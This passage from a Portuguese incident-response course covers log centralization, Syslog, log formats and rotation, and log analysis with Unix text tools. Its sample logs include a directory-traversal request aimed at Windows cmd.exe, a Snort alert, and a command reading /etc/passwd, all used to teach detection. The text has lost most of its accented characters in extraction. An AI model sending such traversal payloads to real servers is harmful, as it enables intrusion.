Figura 7.2
Categorias tpicas
implementadas por
sistemas de logs.
136

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
acesso ao sistema. Sendo assim, ter uma cpia dos logs em outro local permite ter acesso
s informaes mesmo diante da inacessibilidade da fonte dos logs. A situao ainda mais
crtica em ambientes virtualizados baseados em computao em nuvens. Nesses cenrios,
quando a infraestrutura afetada, o acesso s informaes crticas pode ser invivel.
q Uma tcnica bastante comum armazenar os logs remotamente na rede, usando servi-
dores centralizados na mesma estrutura da rede.
Dessa forma, um servidor pode armazenar informaes de diferentes servios de maneira
centralizada. Esses servidores que centralizam informaes de logs podem ser sistemas
dedicados para tal funo com alto nvel de segurana. Por exemplo, servidores onde
apenas possvel que informaes sejam adicionadas ao sistema de arquivo poltica
apenas escrita incremental (append only). Em alguns casos, o servidor de logs central no
possui comunicao com a internet, apenas com a rede interna incluindo as mquinas que
exportam logs e servidores de backup.
A transmisso e coleo de dados de logs um processo relativamente simples. Computa-
dores e dispositivos que implementam subsistemas de logs podem registrar informaes e
transmiti-las segundo a confgurao especifcada.
q Essa transmisso dos eventos de logs para um servidor pode ser realizada de diferentes
maneiras, podendo ser:
1 Exportao em tempo de execuo;
1 Defnir um conjunto de informaes a serem exportadas periodicamente.
Na fgura 7.3, ilustrada uma infraestrutura de coleta e armazenamento de logs. O principal
elemento da estrutura centralizada uma entidade denominada de loghost servidor de
logs que nada mais do que um servidor Unix ou Windows Server onde as informaes
so armazenadas de forma integrada. Dessa forma, os diferentes dispositivos (roteadores,
frewalls, switches e servidores) podem exportar as informaes para o servidor centralizado.
Ainda na fgura 7.3, possvel identifcar um servidor de armazenamento que
gerencia e arquiva as informaes do loghost para perodos de longo prazo.
oine
servidor de
armazenamento
servidor de
logs
ta de
backup
Figura 7.3
Estrutura
centralizada para
armazenamento
de logs.
137

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
q Alm de aspectos de segurana, usar um servidor de logs centralizado pode ter as
seguintes vantagens:
1 Ter um local centralizado para armazenar as informaes de mltiplas fontes de dados;
1 Ter um local para realizar backup de todos os dados de log;
1 Ter um local para analisar e correlacionar informaes de diferentes fontes.
A exportao das informaes de eventos para o servidor central realizada utilizando um
protocolo de comunicao especfco. Uma das maneiras mais utilizadas para transferir as
informaes de eventos (logs) por meio do protocolo Syslog.
O protocolo Syslog um padro aberto defnido pela RFC 3164 para transmitir mensa-
gens de eventos e notifcaes. Para isso, a especifcao do Syslog defne uma arquitetura
modular para transmisso de notifcaes e tambm estipula um formato para as men-
sagens de logs. De forma simplifcada, a arquitetura do Syslog defne dois componentes
bsicos: um cliente (originador de mensagens) e um servidor (coletor de mensagens).
O cliente Syslog responsvel por gerar as informaes de eventos e pode ser confgurado
para enviar as informaes para um servidor local ou um servidor de logs remoto. J o
servidor Syslog, responsvel por receber, ou retransmitir, as informaes dos clientes e
armazen-las em um repositrio de dados, tipicamente um sistema de arquivo.
Como descrito, todas as informaes transmitidas entre o cliente e um servidor de um
sistema de log so realizadas via protocolo de transporte homlogo. O protocolo Syslog, por
sua vez, utiliza-se do protocolo UDP. Logo, todas as mensagens de eventos e notifcaes
transmitidas para servidores remotos utilizam a porta 514/UDP. Em verses mais modernas
do protocolo, tais como o rsyslog e syslog-ng, tambm possvel transmitir informaes de
eventos com confrmao de entrega, usando o protocolo TCP.
O Syslog no o nico mecanismo de transmisso e coleta de logs. Existem outras imple-
mentaes com especifcaes abertas, e tambm implementaes utilizando protocolos
proprietrios.
q A seguir os mecanismos mais utilizados em infraestrutura de coleta de logs:
1 Syslog: protocolo aberto baseado UDP. Mais comum e prevalente mecanismo para log;
1 Simple Network Management Protocol (SNMP): originalmente utilizado para gerencia-
mento de rede, no entanto pode ser utilizado para registrar determinados eventos (via traps);
1 Windows Event Log: formato proprietrio de logs da empresa Microsoft. Pode ser
utilizado na maioria dos dispositivos usando a plataforma Windows;
1 Banco de Dados: algumas aplicaes utilizam base de dados remota para armazenar
informaes de logs de uma maneira estruturada;
1 Protocolos proprietrios: alguns sistemas e aplicaes implementam protocolos custo-
mizados, at mesmo criptografados, para transferir e coletar informaes dos eventos.
Uma infraestrutura de logs pode ser composta por diferentes protocolos. No raro observar
ambientes heterogneos onde diferentes solues (protocolos e mecanismos) so utilizadas
para compor uma estrutura central de coleta de logs. Consequentemente, em ambientes
heterogneos, observam-se diferentes tipos de formatos e taxonomia de mensagens. Na
sequncia, os aspectos relacionados com os diferentes formatos de logs so abordados.
Diversidade no formato dos logs
Como comentado, os ambientes heterogneos so compostos por dispositivos e aplicaes
que nem sempre seguem um nico formato ou especifcao para registro de eventos.
Syslog como aplicao:
para coletar e
armazenar eventos.
Protocolo: transporte
de eventos.
l
138

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Cada sistema de registro de eventos possui suas prprias caractersticas, com as suas res-
pectivas vantagens e desvantagens (vide tabela 7.1).
q possvel classifcar os formatos de logs nas seguintes categorias:
1 Syslog: formato de mensagem baseado na especifcao Syslog, contemplando
syslog-ng, rsyslog e demais implementaes que so embasadas no Syslog. O
formato Syslog um formato texto sem uma especifcao rgida no formato das
mensagens. Embora as mensagens apresentem certa estrutura, o contedo da
mensagem pode ser composto com qualquer informao de eventos. Ou seja, no
existe um dicionrio de termos que podem ser utilizados para expressar o universo
de eventos reportados;
1 Texto puro: so arquivos-texto que descrevem eventos sem nenhuma estrutura
especifcada. O registro de eventos no segue um padro comum. Vale-se da forma
livre. Esse tipo de formato comum para registrar eventos de aplicaes onde as
mensagens so acrescentadas sequencialmente em um arquivo de logs;
1 Formato binrio: esses tipos de formatos geralmente so especifcados por fabri-
cantes para representar mensagens de eventos de seus dispositivos, tais como frewalls
e aplicaes de segurana. Tipicamente as informaes so bem estruturadas e
podem ser facilmente analisadas por uma ferramenta ou aplicao de anlise. Existem
formatos binrios que no so proprietrios, tal como o formato pcap utilizado pelo
analisador de rede tcpdump. Nesses casos, o formato binrio utilizado por questes
de desempenho: registrar uma grande quantidade de eventos sem a necessidade de
convert-las para um formato de texto menos custoso computacionalmente.
Vantagens Desvantagens
Syslog
Disponvel em boa parte dos sistemas
facilitando a integrao com ferramentas
e dispositivos existentes.
Formato no estruturado ou semiestruturado.
A anlise de informaes de forma automati-
zada nem sempre trivial e pode ser custosa.
Texto Puro
Tipicamente utilizado para depurao de
aplicaes, onde o desenvolvedor tem
liberdade para estruturar as informaes.
Ausncia de estruturao. Muitas vezes as
informaes so teis apenas para o desen-
volvedor.
Formato binrio
Anlise das informaes armazenadas
pode ser automatizada por apresentarem
um formato bem estruturado.
No pode ser lido por editores tradicionais de
texto, sendo necessrias ferramentas espec-
ficas para a leitura.
Na sequncia, so apresentados diferentes tipos de logs para que um investigador possa
familiarizar-se com o formato e com que tipo de informao pode ser encontrado nos
sistemas a serem analisados.
q Autenticao de um usurio utilizando o servio SSH em um ambiente Linux
Oct 6 00:20:54 server sshd[22652]: Accepted password for root
from 200.x.1.6 port 39856 ssh2
Reincio de Sistema Operacional Linux
Dec 18 11:18:20 sysgate shutdown[31208]: shutting down for system
reboot
Ajuste de sincronizao de tempo realizado pelo servio NTP
Oct 5 15:32:26 server ntpd[18983]: adjusting clock frequency by
-0.298083 to -0.429360ppm
Tabela 7.1
Caractersticas dos
diferentes formatos
de logs.
139

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
q Criando um usurio no sistema Windows
Oct 29 08:43:36 10.10.10.10 Security: 624: <DOMAIN>\<ADM USER>:
User Account Created: New Account Name: <USER CREATED> New
Domain: <DOMAIN>
Troca de privilgio
Mar 30 15:14:33 HOST su: [ID 366847 auth.notice] su root succe-
eded for USER on /dev/pts/2
Log de frewall Checkpoint
Oct 9 14:20:25 nok1 [LOG_CRIT] kernel: fwlock_call_at_release:
no memory available for operation
Alterao de confgurao de um roteador da marca Extreme
Apr 4 14:31:03 10.18.3.253 KERN: NV:Starting configuration save
(primary) operation
Erro de autenticao do software VNC
Oct 25 13:45:45 10.10.10.200 WinVNC4: 1: SConnection: AuthFailu-
reException: Either the username was not recognised, or the
password was incorrect
Tentativa de acesso a um servidor web
2001:X:X:X::108 - - [30/Sep/2013:18:40:06 -0300] GET //cgi-bin/..%
c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/
c+dir+c: HTTP/1.1 404 7488 Mozilla/5.0 (X11; Linux; rv:1 7.0)
Gecko/17.0 Firefox/17.0 OpenVAS/6.0.0
Alerta gerado pelo IDS Snort
[**] [1:1002:15] WEB-IIS cmd.exe access [**] [Classification:
Web Application Attack] [Priority: 1] 10/24-20:15:11.900014
x.x.x.x:42200 -> y.y.y.y:80 TCP TTL:56 TOS:0x0 ID:15236 IpLen:20
DgmLen:288 DF***AP*** Seq: 0x1B16EAE9 Ack: 0x905BABE1 Win:
0x43E0 TcpLen: 32
Fora bruta a um servio VoIP
2013-09-30 22:07:28 X.X.X.17/2231->xxx.xxx.2.59/5060 17(0)
2013-09-30 22:07:28 X.X.X.17/2231->xxx.xxx.2.74/5060 17(0)
Gerenciamento de logs
q Uma instituio deve implementar certas polticas para gerenciar os registros de eventos
dos diferentes sistemas monitorados.
As tarefas de gerenciamentos envolvem atividades como instalao e atualizao de softwares,
confgurao de sistemas coletores e tambm prover recursos para manter a estrutura
funcional como um todo. No contexto do gerenciamento de logs, o armazenamento de
informaes demanda ateno especial. Frequentemente grande quantidade de logs deve
ser gerenciada e armazenada de maneira a ser til para anlises posteriores. Essas informa-
es de logs podem ser teis em uma investigao de um incidente e tambm podem ser
demandadas para questes judiciais.
140

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Atualmente no existe uma regulamentao para armazenamento de logs. Algumas institui-
es possuem suas prprias polticas, e outras instituies seguem normas internacionais
que demandam o armazenamento de informaes por um longo perodo, por exemplo,
instituies que seguem a especifcao Payment Card Industry (PCI).
De fato, se o grande volume de dados armazenados nos sistemas de arquivos no for mane-
jado de forma correta, podem facilmente consumir todos os recursos de armazenamento do
sistema, o que pode afetar o funcionamento de outros programas sendo executados. Boa
parte dos sistemas implementam mecanismos para automatizar o volume de informaes
gerenciadas por logs. Entre as principais tcnicas utilizadas est a utilizao de compresso
dos dados (gzip) e a rotao de arquivos.
Em sistemas que utilizam solues baseadas no formato Syslog, a compactao dos
arquivos muito utilizada. Por tratar-se somente de arquivos texto, possvel obter uma
taxa de compresso muito alta usando os algoritmos tradicionais de compresso, tal como
gzip, bunzip e outros. Por outro lado, em arquivos binrios, a compresso nem sempre
atinge resultados satisfatrios; no entanto, os arquivos binrios tendem a ter um formato
mais compacto, o que facilita o armazenamento.
Outra tcnica utilizada pela maioria dos sistemas a rotao de arquivos. A rotao de
arquivos de logs consiste em arquivar o arquivo corrente e instanciar um novo.
q Esse arquivamento pode ocorrer de forma peridica diria, semanal, mensal ou,
ainda, quando determinados limiares foram atingidos, tal como:
1 Tempo: o arquivo de log rotacionado baseado em um perodo de tempo;
1 Tamanho: o arquivo rotacionado quando um determinado tamanho de disco
atingido, por exemplo, 100M, 1G;
1 Tempo e tamanho: nesse caso, o arquivo rotacionado quando um determinado
tamanho de arquivo atingido ou quando um determinado tempo atingido.
Algumas ferramentas incorporam a funcionalidade de compactao do arquivo na
mesma etapa.
q Dessa maneira, possvel ter a seguinte estrutura de arquivos de logs:
1. messages.log: arquivo de log atual onde as informaes esto sendo salvas
2. messages.2014.log.gz: log rotacionado contendo informaes de eventos do ltimo ano.
O gerenciamento das informaes de logs devem considerar as particularidades de cada ins-
tituio. Portanto, necessrio estimar o volume de informaes que so geradas pelos sis-
temas de logs e por quanto tempo essas informaes devem ser mantidas com segurana.
Anlise de logs
q
A contextualizao anterior possibilitou uma viso geral do processo de logs.
Para isso, foram descritos elementos e tambm os principais formatos das mensagens de
logs. Nesta etapa sero descritas metodologias e tcnicas que podem ser utilizadas no pro-
cesso de anlise de logs.
q A anlise de logs aqui explicitada pode ser aplicada nos mais diversos contextos,
incluindo o processo de resposta a incidentes.
Na investigao de um incidente de segurana, em especial, os logs podem prover informa-
es sobre a potencial origem de um ataque e tambm identifcar as aes desempenhadas
por um atacante para comprometer um sistema.
No Brasil, o CGI.br
(Comit Gestor da
Internet no Brasil)
props uma recomen-
dao onde aconselha
o arquivamento de logs
por um perodo de trs
anos. Mais informaes
podem ser obtidas em:
http://www.cgi.br/
publicacoes/documen-
tacao/desenvolvi-
mento.htm
l
141

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
q Tanto nas atividades de deteco de incidentes quanto para a resposta a incidentes,
muitas vezes um CSIRT passa por atividades relacionadas com a investigao de logs.
Tipicamente notifcaes de incidentes possuem logs armazenados que descrevem detalhes
do incidente sendo notifcado.
q Sendo assim, identifcar informaes crticas armazenadas nos logs crucial para dar
procedimento ao processo de resposta a incidentes.
Afnal, as diferentes informaes encontradas nos sistemas de logs podem ser utilizadas
para compor indcios de comprometimento de sistemas.
q De forma resumida, a anlise de logs relacionada com o processo de resposta a inci-
dentes possibilita:
1 Identifcar padro de trfco no usual;
1 Comandos executados e processos instanciados;
1 Identifcar origem dos acessos aos sistemas;
1 Modifcaes em sistemas e arquivos;
1 Possveis erros e excees ocasionadas pela execuo de programas.
Identifcar atividades maliciosas e comportamentos anormais nos arquivos de logs pode
ser uma tarefa complexa. Nem sempre o processamento das informaes presentes nos
arquivos pode ser processado manualmente ou, ainda, automatizado na sua totalidade.
Diante disso, torna-se necessrio enumerar as principais difculdades encontradas no pro-
cessamento de logs.
q Entre os principais desafos, encontram-se:
1 Grande volume de dados: o volume de dados registrados por diferentes sistemas e
aplicaes de uma instituio pode facilmente a chegar a gigabytes dirios. Com esse
volume, a anlise manual torna-se invivel e faz-se necessrio utilizar ferramentas
para lidar com as informaes;
1 Ausncia de informaes: informaes crticas dos logs, tal como data e hora com
fuso horrio, difcultam a anlise dos logs;
1 Falsos alarmes: mensagens que no refetem a realizada, como por exemplo, mensa-
gens de falso positivo originadas por sistemas IDSs;
1 Dados duplicados: um evento de log pode ter sido registrado por diferentes fontes
de informao. Isso essencialmente crtico quando as fontes de informaes (dispo-
sitivos) no apresentam sincronia de dados;
1 Diversidade de informaes: devido falta de padronizao dos dados, muitas
vezes diversas fontes de informaes devem ser analisadas para chegar real con-
cluso da anlise;
1 Difculdade de obter dados: em alguns casos cada dispositivo utiliza um formato
prprio para armazenar as informaes. Quando se deseja analisar informaes em
um coletor centralizado, nem sempre possvel exportar os dados em um formato
unifcado para que a anlise seja realizada de forma normalizada.
Diante disso, cabe equipe desenvolver metodologias que consigam enderear as princi-
pais difculdades do processo de anlise de logs, previamente descritas. As ferramentas e
tcnicas utilizadas para anlise de logs geralmente consideraram ambientes heterogneos
com diferentes formatos de mensagens de logs e, tambm, as diferentes aplicaes
responsveis por gerar eventos de log.
142

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
De fato, a anlise de logs consome tempo, sobretudo com o crescente do nmero de
sistemas que necessitam ser monitorados. Nota-se grande quantidade de eventos relacio-
nados com a segurana de sistemas, incluindo varreduras causadas por worms e ataques
automatizados destinados a certos servios. Sendo assim, muitos times optam por analisar
um subconjunto das informaes armazenadas de cada vez, priorizando os logs dos sis-
temas mais crticos para a instituio.
Certas instituies, por exemplo, buscam priorizar eventos de segurana relacionados com
aplicaes web especfcas. Outras, porm, do preferncia a alertas de ferramentas de
segurana, tal como frewalls e IDS.
q De uma forma geral, o processo de anlise de logs pode classifcar os logs em diferentes
categorias, sendo:
1 Arquivos de rede: trfego de rede incluindo pacotes, conexes, protocolos, ende-
reos Ips e varreduras de rede;
1 Arquivos de sistema: dados do sistema incluindo uso de CPU, uso de memria,
reincio do dispositivo, sistema de arquivo (espao livre, arquivos abertos, data de
acesso aos arquivos);
1 Dados de processos: que processos esto sendo executados.
A anlise das diferentes categorias pode ser implementada por ferramentas especfcas
que permitem automatizar parte das etapas do processo de anlise de logs. Para isso, uma
metodologia genrica de anlise de logs deve ser constituda.
q Uma metodologia tipicamente especifca etapas bem defnidas:
1 Filtragem;
1 Normalizao;
1 Correlao.
A fgura 7.3 ilustra uma metodologia de anlise de logs composta por trs etapas bsicas.
Com isso, possvel observar o fuxo de informao de um processo genrico de anlise de
mensagens de logs.
arquivo de log
normalizao
dados
no ltrados
anlise
alerta
armazenamento
ltro correlao
q Como pode ser observado na fgura, um fuxo tpico de informaes no processo de
anlise de logs passa pela etapa de fltragem, normalizao e correlao.
Figura 7.4
Fluxo tpico de
informaes
para anlise de
mensagens de logs.
143

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
Assim que um arquivo de log analisado, busca-se fltrar por certos tipos de eventos.
Quando esses eventos so mapeados, estes so direcionados para a etapa de normalizao.
J os dados no identifcados pelo fltro podem ser descartados da anlise ou ainda armaze-
nados em uma base para posterior processamento.
q Na fase de normalizao, as diferentes mensagens de logs so unifcadas e organizadas
de modo a minimizar redundncia dos dados. Na sequncia, o contedo das mensagens
passa para a etapa de correlao de eventos. Na correlao, os eventos de diferentes
fontes podem ser compostos para uma anlise mais precisa propiciando, por exemplo:
gerar alertas de segurana; utilizao de tcnicas especfcas de investigao; e ainda o
armazenamento dos dados para posterior anlise.
Na sequncia, as etapas so descritas com maior nvel de detalhamento.
Filtragem
q Como comentado anteriormente, a etapa de fltragem tem por objetivo identifcar men-
sagens de logs segundo um critrio pr-defnido.
Dessa forma, pode-se restringir a anlise de logs s mensagens que tenham um determi-
nado padro ou, ainda, mensagens pertencentes a um perodo de tempo especfco.
q
Tipicamente utilizam-se ferramentas para fltrar informaes de logs.
Existe um conjunto de ferramentas bem simples, porm efcientes para o processamento
de informaes presentes em arquivos de logs. Boa parte dessas ferramentas foi concebida
para ambiente UNIX, no entanto, podem ser encontradas de forma gratuita para outros
sistemas (Windows ou MAC). Acredita-se que a audincia deste curso j esteja familiari-
zada com essas ferramentas; mesmo assim, cabe relembrar a sua aplicao no contexto de
anlise de logs.
De uma forma geral, os comandos de fltragem recebem um texto de entrada, aplicam um
processamento e, por fm, apresentam o resultado da fltragem na sada padro do sistema.
q Na sequncia so apresentados funcionalidades dos comandos mais populares:
cut: separa linhas em campos
O comando cut exibe pores selecionadas das linhas de entrada. Sendo comumente uti-
lizado para extrair campos delimitados. O delimitador de campos padro o <TAB>; no
entanto, o delimitador pode ser alterado utilizando a opo -d. A opo f especifca
que campos devem ser includos na sada.
sort: ordena as linhas
O comando sort ordena as linhas ou colunas de um arquivo texto. Alm de ordenar
o contedo de forma crescente ou decrescente, possvel realizar uma ordenao
baseando-se em contedo alfanumrico e contedo numrico presente no arquivo.
uniq: exibe linhas nicas
O comando uniq identifca linhas redundantes de um arquivo. Com isso, possvel
remover linhas repetidas de um arquivo ou, ainda, contar a ocorrncia de cada linha
processada. O uniq assume que o texto de entrada seja previamente ordenado, logo
geralmente utilizado em conjunto com o comando sort.
wc: conta linhas, palavras e caracteres
O comando wc permite contar elementos de um arquivo texto, incluindo: caracteres,
palavras, linhas e bytes.
144

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q tee: copia a entrada em duas sadas
O comando tee permite replicar um texto de entrada para duas sadas simultaneamente.
Por exemplo, possvel ao mesmo tempo salvar o resultado de um comando em um
arquivo texto e exibi-lo na sada padro de forma paginada.
head e tail: l do comeo de arquivo e da sada
Os comandos head e tail exibem o contedo de um arquivo de forma parcial. Respecti-
vamente, o head e tail exibem um determinado nmero de linhas do arquivo a partir do
incio e do fm do arquivo. Isso muito til em arquivos grandes; dessa forma, possvel
extrair as ltimas mensagens de logs sem ter de processar o arquivo inteiro.
grep: localizar padres ou expresses regulares em arquivos texto
O comando grep corresponde a uma ferramenta bastante robusta para localizar
padres e expresses regulares em arquivos de texto.
awk: ferramenta verstil para processar textos
O comando awk uma ferramenta bastante verstil para o processamento de texto,
onde uma linguagem prpria de programao especifcada de modo a facilitar a
anlise de dados. Como funcionalidades, o awk permite extrair, isolar e substituir partes
de um texto.
sed: ferramenta muito fexvel para realizar buscas e substituies
O comando sed tambm pode ser considerado uma linguagem de programao. Assim
como o comando awk, o comando sed permite extrair, isolar e substituir partes de um
texto. Algumas operaes so mais triviais de serem implementadas no comando sed do
que no awk; no entanto, so comandos que possuem recursos semelhantes.
As ferramentas recm-descritas so fundamentais para a fltragem de mensagens de logs.
Sabe-se que essas ferramentas podem ser combinadas de modo a produzir melhores resul-
tados. Por exemplo, o comando a seguir:
user@server:$ cat /etc/passwd | grep bash | cut -d ":" -f 1,7
root:/bin/bash
esr:/bin/bash
rnp:/bin/bash
visitante:/bin/bash
Na fgura so ilustrados alguns comandos para fltragem de texto de forma combinada. Como
pode ser visto, o arquivo /etc/passwd processado em busca da palavra bash. Por fm, o
comando cut secciona o texto usando o : como delimitador e exibe o primeiro e o stimo
campo identifcado. Uma possvel interpretao para esse comando seria: liste todos os usu-
rios que possuem o interpretador de comandos bash como padro no Sistema Operacional.
Normalizao
q A normalizao busca organizar as diferentes mensagens e formatos de logs de modo a
minimizar redundncia dos dados.
No processo de investigao de um incidente, muitas vezes necessrio unifcar as men-
sagens dos diferentes sistemas de modo a fltrar certos tipos de padres. No entanto, um
CSIRT deve estar preparado para lidar com diferentes formatos de logs; afnal, difcil
encontrar uma organizao com um nico formato de log por diversas razes: questes
polticas, diferentes vendedores de dispositivos, aplicativos legados e outros.
Figura 7.5
Comandos de
fltragem de texto.
145

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
Muitas vezes, os diferentes sistemas podem produzir mensagens de logs de modo estruturado
(xml, json) e tambm em formato puro com ausncia de estrutura. Nesse contexto, aconse-
lha-se durante o processo de investigao organizar as informaes em um formato unifcado
de modo a facilitar a anlise de informaes. Nessa unifcao, devem ser tratadas questes
como formato da data, formato do horrio e codifcao dos caracteres (utf-8, isso 8999-1).
q Existem campos comuns que geralmente esto presente nos diferentes formatos de
logs, entre eles:
1 Origem/Destino;
1 Tempo;
1 Protocolo;
1 Porta;
1 Nome de usurio;
1 Evento/Notifcao/Alerta.
Esse processo nem sempre trivial quando aplicado aos diferentes sistemas de log, tal como:
Syslog, multilog, Windows Eventlog e SNMP. Evidentemente, arquivos estruturados e em modo
texto podem ser trabalhados de forma mais fexvel. Um exemplo apresentado a seguir:
q Log-server1.txt: Log do servidor web Windows
192.168.114.201, -, 03/20/01, 7:55:20, W3SVC2, SERVER, 200.X.X.X,
4502, 163, 3223, 200, 0, GET, /DeptLogo.gif, -,
Log-server2.txt: Log do servidor web Linux
192.168.1.1 - - [31/Dec/2007:00:17:10 +0100] GET /cgi-bin/example.
cgi HTTP/1.1 200 2708 - curl/7.15.5 (i4 86-pc-linux-gnu)
libcurl/7.15.5 OpenSSL/0.9.8c zlib/1.2.3 libidn/0.6.5 2 example
user@server:$ cat Log-server1.txt | awk -F ','{print "DATA="$3$4 ", IP="$1 ", "$13 $14}' &&
cat Log-server2.txt | awk -F ' ' '{print "DATA="$4 ", IP="$1 ", "$6 $7}' | tr -d '" ['
DATA= 03/20/01 7:55:20 , IP=192.168.114.201, GET /DeptLogo.gif
DATA= 31/Dec/2007:00:17:10, IP=192.168.1.1, GET/cgi-bin/example.cgi
Na fgura possvel observar um exemplo onde logs de diferentes sistemas so normali-
zados. O primeiro log (Log-server1.txt) contm uma requisio web de um servidor
Windows. J o arquivo seguinte contm uma requisio para um servidor web Linux. Como
resultado, alguns campos so fltrados de modo a produzir um formato mais uniforme.
Correlao
q A fase de correlao de mensagens de logs busca identifcar aes relacionadas com um
determinado evento investigado.
Por exemplo, uma mquina realizando varreduras na rede interna e acessando constan-
temente um canal de comunicao IRC pode caracterizar eventos correlacionados a um
comprometimento por bot.
q Na etapa de correlao, todas as informaes dos logs normalizadas previamente so
analisadas de modo a obter indcios de um incidente de segurana. Para efetuar essa
correlao de eventos, podem-se usar informaes como origem de um ataque, alvo de
um ataque, horrio inicial, horrio fnal e caractersticas de trfego.
Figura 7.6
normalizao das
mensagens de logs
de servidores web.
146

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
De forma pragmtica, existem algumas tcnicas que podem ser utilizadas para auxiliar no
processamento e correlao de eventos.
Na sequncia, as principais tcnicas so descritas:
Busca de padres
q Essa tcnica consiste em identifcar padres especfcos de mensagens de logs. Para isso,
o investigador deve ter conhecimento prvio do tipo de evento que est pesquisando, tal
como: IP atacado ou IP do atacante. Dessa forma, possvel reduzir consideravelmente o
volume de mensagens que necessita ser investigadas.
Essa tcnica muito utilizada no processo de resposta a incidentes, onde a equipe de
investigao busca confrmar a existncia de um incidente e tambm identifcar os eventos
correlacionados com uma notifcao recebida. No entanto, quando aplicada na identif-
cao proativa de incidentes, a busca de padres apresenta algumas lacunas. Os padres
necessitam ser previamente identifcados. Ataques que utilizam padres no conhecidos
so ignorados pela anlise.
user@server:$ grep -i "Invalid user" sshd.log | cut -d " " -f7-9 | sort | uniq -c |
sort -kl -nr | head
121 Invalid user test
118 Invalid user guest
17 Invalid user toor
15 Invalid user tester
15 Invalid user student
14 Invalid user testing
14 Invalid user students
10 Invalid user root
10 Invalid user lpd
7 Invalid user webmaster
A fgura ilustra a busca de padres em logs do servio SSH, nos quais foi utilizado um usurio
invlido para acessar o sistema. Essas informaes podem ser teis para identifcar uma
varredura de fora bruta realizada em um determinado servidor que faz o uso do servio SSH.
Sumarizao de informaes
q Essa tcnica busca resumir informaes contidas em um arquivo de log em especfco,
mostrando a frequncia de certas informaes, tal como nmero de linhas, nmero de
acessos; nmero de origens e outras. Geralmente, a sumarizao realizada por uma
ferramenta especializada em um formato de arquivo, pois a ferramenta necessita saber
a semntica do arquivo de log para compor as informaes resumidas.
Figura 7.7
Busca de padres
em logs do servio
SSH.
147

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
user@server:$ cat kern.log | tr -d "DF" | awk '{print $11,$18,$20}' | sort | uniq -c |
sort -nr -kl | more
8 SRC=218.X.X.211.19 PROTO=UP PT=42015
8 SRC=216.X.X.19.172 PROTO=UP PT=42015
8 SRC=124.X.X.67.183 PROTO=UP PT=42015
8 SRC=112.X.X.161.9 PROTO=UP PT=42015
7 SRC=211.X.X.245.41 PROTO=UP PT=42015
7 SRC=189.X.X.177.13 PROTO=TCP PT=22
6 SRC=222.X.X.25.44 PROTO=TCP PT=9999
4 SRC=61.X.X.74 PROTO=TCP PT=22
4 SRC=222.X.X.30 PROTO=TCP PT=22
4 SRC=218.X.X.91 PROTO=UP PT=42015
A fgura ilustra a sumarizao de todos os acessos bloqueados pelo fltro de pacotes
iptables. Ao contrrio da busca de padres, a tcnica de sumarizao apresenta uma verso
resumida das informaes mapeadas. Isso essencialmente til quando se tem um grande
volume de informaes para ser processados.
Remoo de informaes
q Nesta tcnica, tambm conhecida por AI (artifcial ignorance), busca-se remover infor-
maes no relevantes para anlise.
Isso signifca reduzir variaes no desejadas, ou sabidamente normais nos logs, tais como:
informaes de controle de logs (hearbeat), e nmero dos processos (pid). Como resultado, so
apresentadas informaes no usuais colapsadas com a sua respectiva frequncia identifcada.
Como comentado, os arquivos de logs podem conter informaes com nvel de detalha-
mento elevado. Nem sempre todas essas informaes todos os campos de uma men-
sagem de log necessitam ser analisados para investigar um determinado incidente.
Ferramentas para o processamento de logs
q Alm das tcnicas descritas, existe um conjunto de ferramentas especializadas para
implementar o processamento de mensagens de logs.
Tais ferramentas so muito heterogneas, cada qual implementa suas prprias tcnicas
de anlise de logs incluindo tcnicas especializadas utilizando inteligncia artifcial. Existe
grande quantidade de ferramentas comerciais e gratuitas para isso.
q Na sequncia, sero descritas algumas ferramentas tradicionais utilizadas por adminis-
tradores para gerenciar as informaes de logs.
1 logcheck: uma ferramenta desenvolvida para analisar automaticamente arquivos
de log em busca de violaes de segurana e atividades no usuais. Para isso, a
ferramenta utiliza uma lista de expresses regulares para classifcar as mensagens
dos logs. Dessa forma, possvel defnir categorias, tal como: violao de sistema,
mensagens a ignorar, tentativas de comprometimento e outras. Outro recurso da fer-
ramenta a possibilidade de agendar o processamento das mensagens de logs (hora/
dia/semana/ms) permitindo o envio das anlises automatizadas via e-mail;
Figura 7.8
Sumarizao
dos acessos
bloqueados no
fltro de pacotes
iptables.
148

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 swatch: muito semelhante ao logchecker. Tambm utiliza expresses regulares para
classifcar eventos de logs; no entanto, como diferencial a ferramenta permite instan-
ciar aes para cada evento classifcado. Por exemplo, assim que muitas tentativas
de conexo de um determinado IP so detectadas, uma regra de bloqueio pode ser
inserida no fltro de pacotes;
1 OSSEC: ferramenta de cdigo aberto para armazenamento e anlise de logs. O con-
junto de funcionalidades da ferramenta incluem agentes para diferentes plataformas
com os quais possvel receber informaes de sistemas de logs, tal como o Syslog.
O OSSEC possui um conjunto de regras pr-instaladas com as quais os logs podem
ser processados de maneira automatizada, reduzindo consideravelmente o trabalho
manual de investigao. Adicionalmente a ferramenta possui suporte para anlise de
logs em tempo real;
1 Splunk: ferramenta comercial que possui funcionalidades semelhantes ao OSSEC.
